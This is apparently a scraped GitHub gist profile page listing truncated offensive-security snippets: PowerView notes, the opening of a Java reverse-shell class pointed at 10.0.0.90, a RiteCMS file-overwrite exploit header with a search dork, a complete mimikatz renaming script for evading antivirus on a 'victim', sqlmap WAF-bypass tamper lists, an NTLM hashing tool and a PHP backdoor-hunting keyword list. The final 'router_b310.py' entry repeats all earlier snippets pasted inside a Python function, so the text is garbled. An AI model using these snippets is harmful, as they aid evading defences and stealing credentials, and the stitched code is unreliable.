Faisal Fs ⚔️ faisalfs10x

## PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

## C.java
// Not sure where I originally got this from.
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class C {

  public C() throws Exception {
    String host="10.0.0.90";

## squid_proxy_tutorial.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                faisalfs10x
                / squid_proxy_tutorial.md
            
            
              Last active
              October 21, 2021 14:44
                — forked from jackblk/squid_proxy_tutorial.md
            
              
                Tutorial on how to setup a squid proxy with authentication.
              
          
    Note

This tutorial is for Ubuntu & Squid3. Use AWS, Google cloud, Digital Ocean or any services with Ubuntu to follow this tutorial.
Install squid & update

sudo apt-get update -y
sudo apt-get install squid3 -y
sudo apt-get install apache2-utils -y


## RiteCMS - Arbitrary File Overwrite (Authenticated).txt
# Exploit Title: RiteCMS - Arbitrary File Overwrite (Authenticated)
# Date: 2021-07-25
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP


## mimikatz_obfuscator.sh
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/candycrush
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'

## pwd2NTLM.py
import hashlib
import argparse

parser = argparse.ArgumentParser(description='Password to NTLM')
parser.add_argument("-w","--wordlist",required=True, help = "wordlist file to be converted to NTLM")
args = parser.parse_args()
wordfile = args.wordlist

total_converted = 0
f = open(wordfile, "r")

## sqlmap tamper scripts
https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3

# All scripts
```
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
```
# General scripts
```
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```

## sqlmap-tamper-scripts-evaluation.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                faisalfs10x
                / sqlmap-tamper-scripts-evaluation.md
            
            
              Created
              February 15, 2021 02:55
                — forked from mgeeky/sqlmap-tamper-scripts-evaluation.md
            
              
                SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF
              
          
    SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY
Below names are to be passed to the --tamper= parameter of sqlmap.
The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests view.
The scale is 0-5.

  
## seclist_malicious.txt
# strings for finding backdoor shells, rootkits, botnets, and exploitable functions
# grep -Rn "shell *(" /var/www
exec
passthru
shell_exec
system
phpinfo
base64_decode
chmod
mkdir

## router_b310.py
#Faisalfs10x
#!/usr/bin/env python
import time, subprocess
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.firefox.options import Options
from datetime import datetime

def main():
	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
	# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set
	// Not sure where I originally got this from.
	import java.io.IOException;
	import java.io.InputStream;
	import java.io.OutputStream;
	import java.net.Socket;

	public class C {

	public C() throws Exception {
	String host="10.0.0.90";
	# Exploit Title: RiteCMS - Arbitrary File Overwrite (Authenticated)
	# Date: 2021-07-25
	# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
	# Vendor Homepage: https://ritecms.com/
	# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
	# Version: <= 3.1.0
	# Google Dork: intext:"Powered by RiteCMS"
	# Tested on: Windows 10, Ubuntu 18, XAMPP
	# This script downloads and slightly "obfuscates" the mimikatz project.
	# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
	# so removing them from the project before compiling gets us past most of the AV solutions.
	# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
	# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

	git clone https://github.com/gentilkiwi/mimikatz.git windows
	mv windows/mimikatz windows/candycrush
	find windows/ -type f -print0 \| xargs -0 sed -i 's/mimikatz/candycrush/g'
	find windows/ -type f -print0 \| xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'
	import hashlib
	import argparse

	parser = argparse.ArgumentParser(description='Password to NTLM')
	parser.add_argument("-w","--wordlist",required=True, help = "wordlist file to be converted to NTLM")
	args = parser.parse_args()
	wordfile = args.wordlist

	total_converted = 0
	f = open(wordfile, "r")
	https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3

	# All scripts
	```
	--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
	```
	# General scripts
	```
	--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
	```
	# strings for finding backdoor shells, rootkits, botnets, and exploitable functions
	# grep -Rn "shell *(" /var/www
	exec
	passthru
	shell_exec
	system
	phpinfo
	base64_decode
	chmod
	mkdir
	#Faisalfs10x
	#!/usr/bin/env python
	import time, subprocess
	from selenium import webdriver
	from selenium.webdriver.common.keys import Keys
	from selenium.webdriver.firefox.options import Options
	from datetime import datetime

	def main():